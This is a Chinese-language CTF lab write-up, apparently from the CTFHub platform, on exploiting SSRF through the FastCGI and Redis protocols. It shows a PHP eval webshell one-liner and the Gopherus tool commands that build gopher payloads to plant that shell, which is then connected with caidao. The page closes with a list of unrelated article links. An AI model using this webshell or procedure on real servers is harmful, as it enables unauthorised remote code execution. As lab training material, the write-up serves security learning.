当前位置: 首页 > news >正文

CTFHub-FastCGI协议/Redis协议

 将木马进行base64编码

<?php @eval($_GET[cmd]);?>

 打开kali虚拟机,使用虚拟机中Gopherus-master工具

Gopherus-master工具安装

git clone https://github.com/tarunkant/Gopherus.git

进入工具目录 

cd Gopherus

 使用工具

python2 "位置" --exploit fastcgi

 将得到的数据进行url编码

 放到url=后面得到图下代表成功

 打开文件,使用ls ../一级一级找flag

 使用得到的flag_得到

 打开kali虚拟机,使用虚拟机中Gopherus-master工具

python2 "位置” --exploit redis

 将结果进行url编码

将数据放到url=后面

显示504不重要,重要的是木马有没有写进去 

 出现这个表示写进去了

 使用caidao连接木马

http://www.dtcms.com/a/59962.html

相关文章:

  • 最新版本WebContext构造函数-避坑
  • 推理大模型的后训练增强技术-强化学习篇
  • LeetCode 哈希章节
  • Unity入门学习笔记(Day01)
  • JWT的学习
  • 探索大数据分析的无限可能:R语言的应用与实践
  • 远程登录客户端软件 CTerm 发布了 v4.0.0
  • PySide(PyQT)的contains() 方法
  • javascrip网页设计案例,SuperSlide+bootstrap+html经典组合
  • Docker中GPU的使用指南
  • 论文阅读笔记——Learning Fine-Grained Bimanual Manipulation with Low-Cost Hardware
  • 【C++指南】一文总结C++类和对象
  • Primer - 自适应学习,AI学习工具
  • 从 GitHub 批量下载项目各版本的方法
  • 2025 cv2.imwrite存储带有中文路径
  • 第三章 组件(12)- 自定义组件类库
  • Vue项目实战
  • 【Android】setText调用导致的悬浮窗抖动问题
  • 天翼云Gpu主机安装Dify手册
  • 强化学习: 继续看 Q-Learning + FrozenLake, 解决更大的地图 8x8, 10x10
  • 【CUDA】Reduce归约求和(下)
  • 谈谈 HTTP 中的重定向,如何处理301和302重定向?
  • 信息安全技术
  • 国自然青年基金|基于机器学习的胃癌辅助化疗疗效预测模型建立及实证研究|基金申请·25-03-05
  • 数据类设计_图片类设计之2_无规则图类设计(前端架构基础)
  • Python教程(一):基本语法、流程控制、数据容器
  • ESP8266UDP透传
  • c++ 中的 friend 关键字
  • 假设检验与置信区间在机器学习中的应用
  • 动态内存管理的了解及使用